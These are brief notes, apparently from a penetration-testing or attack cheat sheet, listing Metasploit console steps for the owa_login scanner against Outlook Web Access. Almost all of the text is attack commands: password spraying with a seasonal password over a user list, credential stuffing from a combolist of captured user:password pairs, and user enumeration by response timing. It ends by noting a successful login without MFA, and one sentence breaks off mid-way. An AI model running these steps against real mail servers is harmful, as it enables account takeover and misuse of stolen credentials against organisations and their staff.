His favorite tool for OWA is metasploit
search owa
use 6
or
use auxiliary/scanner/http/owa_login
options
set password Winter24!
set user_file users.txt
set threads 10
optional:
set STOP_ON_SUCCESS true
runfor captured passwords/credential stuffing in the same file (like user:password):
set USERPASS_FILE combolist.txt
set threads 10
optional:
set STOP_ON_SUCCESS true
run
metasploit makes a list of valid users based on the delay on the response from the
Successful OWA login with no MFA